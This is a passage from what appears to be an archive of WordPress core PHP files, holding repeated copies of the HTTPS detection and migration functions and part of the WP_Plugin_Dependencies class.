$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605071928.php 0000666 00000013341 15224151220 0011770 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605114554.php 0000666 00000013341 15224151220 0011761 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605132821-20260621081201-20260621210605.php 0000666 00000011205 15224151220 0014720 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605131603-20260621081205.php 0000666 00000011205 15224151220 0013343 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-plugin-dependencies-20260621125501.php 0000666 00000061343 15224151220 0014311 0 ustar 00 <?php
/**
* WordPress Plugin Administration API: WP_Plugin_Dependencies class
*
* @package WordPress
* @subpackage Administration
* @since 6.5.0
*/
/**
* Core class for installing plugin dependencies.
*
* It is designed to add plugin dependencies as designated in the
* `Requires Plugins` header to a new view in the plugins install page.
*/
class WP_Plugin_Dependencies {
/**
* Holds 'get_plugins()'.
*
* @since 6.5.0
*
* @var array
*/
protected static $plugins;
/**
* Holds plugin directory names to compare with cache.
*
* @since 6.5.0
*
* @var array
*/
protected static $plugin_dirnames;
/**
* Holds sanitized plugin dependency slugs.
*
* Keyed on the dependent plugin's filepath,
* relative to the plugins directory.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependencies;
/**
* Holds an array of sanitized plugin dependency slugs.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependency_slugs;
/**
* Holds an array of dependent plugin slugs.
*
* Keyed on the dependent plugin's filepath,
* relative to the plugins directory.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependent_slugs;
/**
* Holds 'plugins_api()' data for plugin dependencies.
*
* @since 6.5.0
*
* @var array
*/
protected static $dependency_api_data;
/**
* Holds plugin dependency filepaths, relative to the plugins directory.
*
* Keyed on the dependency's slug.
*
* @since 6.5.0
*
* @var string[]
*/
protected static $dependency_filepaths;
/**
* An array of circular dependency pairings.
*
* @since 6.5.0
*
* @var array[]
*/
protected static $circular_dependencies_pairs;
/**
* An array of circular dependency slugs.
*
* @since 6.5.0
*
* @var string[]
*/
protected static $circular_dependencies_slugs;
/**
* Whether Plugin Dependencies have been initialized.
*
* @since 6.5.0
*
* @var bool
*/
protected static $initialized = false;
/**
* Initializes by fetching plugin header and plugin API data.
*
* @since 6.5.0
*/
public static function initialize() {
if ( false === self::$initialized ) {
self::read_dependencies_from_plugin_headers();
self::get_dependency_api_data();
self::$initialized = true;
}
}
/**
* Determines whether the plugin has plugins that depend on it.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has plugins that depend on it.
*/
public static function has_dependents( $plugin_file ) {
return in_array( self::convert_to_slug( $plugin_file ), (array) self::$dependency_slugs, true );
}
/**
* Determines whether the plugin has plugin dependencies.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether a plugin has plugin dependencies.
*/
public static function has_dependencies( $plugin_file ) {
return isset( self::$dependencies[ $plugin_file ] );
}
/**
* Determines whether the plugin has active dependents.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has active dependents.
*/
public static function has_active_dependents( $plugin_file ) {
require_once ABSPATH . 'wp-admin/includes/plugin.php';
$dependents = self::get_dependents( self::convert_to_slug( $plugin_file ) );
foreach ( $dependents as $dependent ) {
if ( is_plugin_active( $dependent ) ) {
return true;
}
}
return false;
}
/**
* Gets filepaths of plugins that require the dependency.
*
* @since 6.5.0
*
* @param string $slug The dependency's slug.
* @return array An array of dependent plugin filepaths, relative to the plugins directory.
*/
public static function get_dependents( $slug ) {
$dependents = array();
foreach ( (array) self::$dependencies as $dependent => $dependencies ) {
if ( in_array( $slug, $dependencies, true ) ) {
$dependents[] = $dependent;
}
}
return $dependents;
}
/**
* Gets the slugs of plugins that the dependent requires.
*
* @since 6.5.0
*
* @param string $plugin_file The dependent plugin's filepath, relative to the plugins directory.
* @return array An array of dependency plugin slugs.
*/
public static function get_dependencies( $plugin_file ) {
if ( isset( self::$dependencies[ $plugin_file ] ) ) {
return self::$dependencies[ $plugin_file ];
}
return array();
}
/**
* Gets a dependent plugin's filepath.
*
* @since 6.5.0
*
* @param string $slug The dependent plugin's slug.
* @return string|false The dependent plugin's filepath, relative to the plugins directory,
* or false if the plugin has no dependencies.
*/
public static function get_dependent_filepath( $slug ) {
$filepath = array_search( $slug, self::$dependent_slugs, true );
return $filepath ? $filepath : false;
}
/**
* Determines whether the plugin has unmet dependencies.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has unmet dependencies.
*/
public static function has_unmet_dependencies( $plugin_file ) {
if ( ! isset( self::$dependencies[ $plugin_file ] ) ) {
return false;
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
foreach ( self::$dependencies[ $plugin_file ] as $dependency ) {
$dependency_filepath = self::get_dependency_filepath( $dependency );
if ( false === $dependency_filepath || is_plugin_inactive( $dependency_filepath ) ) {
return true;
}
}
return false;
}
/**
* Determines whether the plugin has a circular dependency.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return bool Whether the plugin has a circular dependency.
*/
public static function has_circular_dependency( $plugin_file ) {
if ( ! is_array( self::$circular_dependencies_slugs ) ) {
self::get_circular_dependencies();
}
if ( ! empty( self::$circular_dependencies_slugs ) ) {
$slug = self::convert_to_slug( $plugin_file );
if ( in_array( $slug, self::$circular_dependencies_slugs, true ) ) {
return true;
}
}
return false;
}
/**
* Gets the names of plugins that require the plugin.
*
* @since 6.5.0
*
* @param string $plugin_file The plugin's filepath, relative to the plugins directory.
* @return array An array of dependent names.
*/
public static function get_dependent_names( $plugin_file ) {
$dependent_names = array();
$plugins = self::get_plugins();
$slug = self::convert_to_slug( $plugin_file );
foreach ( self::get_dependents( $slug ) as $dependent ) {
$dependent_names[ $dependent ] = $plugins[ $dependent ]['Name'];
}
sort( $dependent_names );
return $dependent_names;
}
/**
* Gets the names of plugins required by the plugin.
*
* @since 6.5.0
*
* @param string $plugin_file The dependent plugin's filepath, relative to the plugins directory.
* @return array An array of dependency names.
*/
public static function get_dependency_names( $plugin_file ) {
$dependency_api_data = self::get_dependency_api_data();
$dependencies = self::get_dependencies( $plugin_file );
$plugins = self::get_plugins();
$dependency_names = array();
foreach ( $dependencies as $dependency ) {
// Use the name if it's available, otherwise fall back to the slug.
if ( isset( $dependency_api_data[ $dependency ]['name'] ) ) {
$name = $dependency_api_data[ $dependency ]['name'];
} else {
$dependency_filepath = self::get_dependency_filepath( $dependency );
if ( false !== $dependency_filepath ) {
$name = $plugins[ $dependency_filepath ]['Name'];
} else {
$name = $dependency;
}
}
$dependency_names[ $dependency ] = $name;
}
return $dependency_names;
}
/**
* Gets the filepath for a dependency, relative to the plugin's directory.
*
* @since 6.5.0
*
* @param string $slug The dependency's slug.
* @return string|false If installed, the dependency's filepath relative to the plugins directory, otherwise false.
*/
public static function get_dependency_filepath( $slug ) {
$dependency_filepaths = self::get_dependency_filepaths();
if ( ! isset( $dependency_filepaths[ $slug ] ) ) {
return false;
}
return $dependency_filepaths[ $slug ];
}
/**
* Returns API data for the dependency.
*
* @since 6.5.0
*
* @param string $slug The dependency's slug.
* @return array|false The dependency's API data on success, otherwise false.
*/
public static function get_dependency_data( $slug ) {
$dependency_api_data = self::get_dependency_api_data();
if ( isset( $dependency_api_data[ $slug ] ) ) {
return $dependency_api_data[ $slug ];
}
return false;
}
/**
* Displays an admin notice if dependencies are not installed.
*
* @since 6.5.0
*/
public static function display_admin_notice_for_unmet_dependencies() {
if ( in_array( false, self::get_dependency_filepaths(), true ) ) {
$error_message = __( 'Some required plugins are missing or inactive.' );
if ( is_multisite() ) {
if ( current_user_can( 'manage_network_plugins' ) ) {
$error_message .= ' ' . sprintf(
/* translators: %s: Link to the network plugins page. */
__( '<a href="%s">Manage plugins</a>.' ),
esc_url( network_admin_url( 'plugins.php' ) )
);
} else {
$error_message .= ' ' . __( 'Please contact your network administrator.' );
}
} elseif ( 'plugins' !== get_current_screen()->base ) {
$error_message .= ' ' . sprintf(
/* translators: %s: Link to the plugins page. */
__( '<a href="%s">Manage plugins</a>.' ),
esc_url( admin_url( 'plugins.php' ) )
);
}
wp_admin_notice(
$error_message,
array(
'type' => 'warning',
)
);
}
}
/**
* Displays an admin notice if circular dependencies are installed.
*
* @since 6.5.0
*/
public static function display_admin_notice_for_circular_dependencies() {
$circular_dependencies = self::get_circular_dependencies();
if ( ! empty( $circular_dependencies ) && count( $circular_dependencies ) > 1 ) {
$circular_dependencies = array_unique( $circular_dependencies, SORT_REGULAR );
$plugins = self::get_plugins();
$plugin_dirnames = self::get_plugin_dirnames();
// Build output lines.
$circular_dependency_lines = '';
foreach ( $circular_dependencies as $circular_dependency ) {
$first_filepath = $plugin_dirnames[ $circular_dependency[0] ];
$second_filepath = $plugin_dirnames[ $circular_dependency[1] ];
$circular_dependency_lines .= sprintf(
/* translators: 1: First plugin name, 2: Second plugin name. */
'<li>' . _x( '%1$s requires %2$s', 'The first plugin requires the second plugin.' ) . '</li>',
'<strong>' . esc_html( $plugins[ $first_filepath ]['Name'] ) . '</strong>',
'<strong>' . esc_html( $plugins[ $second_filepath ]['Name'] ) . '</strong>'
);
}
wp_admin_notice(
sprintf(
'<p>%1$s</p><ul>%2$s</ul><p>%3$s</p>',
__( 'These plugins cannot be activated because their requirements are invalid.' ),
$circular_dependency_lines,
__( 'Please contact the plugin authors for more information.' )
),
array(
'type' => 'warning',
'paragraph_wrap' => false,
)
);
}
}
/**
* Checks plugin dependencies after a plugin is installed via AJAX.
*
* @since 6.5.0
*/
public static function check_plugin_dependencies_during_ajax() {
check_ajax_referer( 'updates' );
if ( empty( $_POST['slug'] ) ) {
wp_send_json_error(
array(
'slug' => '',
'pluginName' => '',
'errorCode' => 'no_plugin_specified',
'errorMessage' => __( 'No plugin specified.' ),
)
);
}
$slug = sanitize_key( wp_unslash( $_POST['slug'] ) );
$status = array( 'slug' => $slug );
self::get_plugins();
self::get_plugin_dirnames();
if ( ! isset( self::$plugin_dirnames[ $slug ] ) ) {
$status['errorCode'] = 'plugin_not_installed';
$status['errorMessage'] = __( 'The plugin is not installed.' );
wp_send_json_error( $status );
}
$plugin_file = self::$plugin_dirnames[ $slug ];
$status['pluginName'] = self::$plugins[ $plugin_file ]['Name'];
$status['plugin'] = $plugin_file;
if ( current_user_can( 'activate_plugin', $plugin_file ) && is_plugin_inactive( $plugin_file ) ) {
$status['activateUrl'] = add_query_arg(
array(
'_wpnonce' => wp_create_nonce( 'activate-plugin_' . $plugin_file ),
'action' => 'activate',
'plugin' => $plugin_file,
),
is_multisite() ? network_admin_url( 'plugins.php' ) : admin_url( 'plugins.php' )
);
}
if ( is_multisite() && current_user_can( 'manage_network_plugins' ) ) {
$status['activateUrl'] = add_query_arg( array( 'networkwide' => 1 ), $status['activateUrl'] );
}
self::initialize();
$dependencies = self::get_dependencies( $plugin_file );
if ( empty( $dependencies ) ) {
$status['message'] = __( 'The plugin has no required plugins.' );
wp_send_json_success( $status );
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
$inactive_dependencies = array();
foreach ( $dependencies as $dependency ) {
if ( false === self::$plugin_dirnames[ $dependency ] || is_plugin_inactive( self::$plugin_dirnames[ $dependency ] ) ) {
$inactive_dependencies[] = $dependency;
}
}
if ( ! empty( $inactive_dependencies ) ) {
$inactive_dependency_names = array_map(
function ( $dependency ) {
if ( isset( self::$dependency_api_data[ $dependency ]['Name'] ) ) {
$inactive_dependency_name = self::$dependency_api_data[ $dependency ]['Name'];
} else {
$inactive_dependency_name = $dependency;
}
return $inactive_dependency_name;
},
$inactive_dependencies
);
$status['errorCode'] = 'inactive_dependencies';
$status['errorMessage'] = sprintf(
/* translators: %s: A list of inactive dependency plugin names. */
__( 'The following plugins must be activated first: %s.' ),
implode( ', ', $inactive_dependency_names )
);
$status['errorData'] = array_combine( $inactive_dependencies, $inactive_dependency_names );
wp_send_json_error( $status );
}
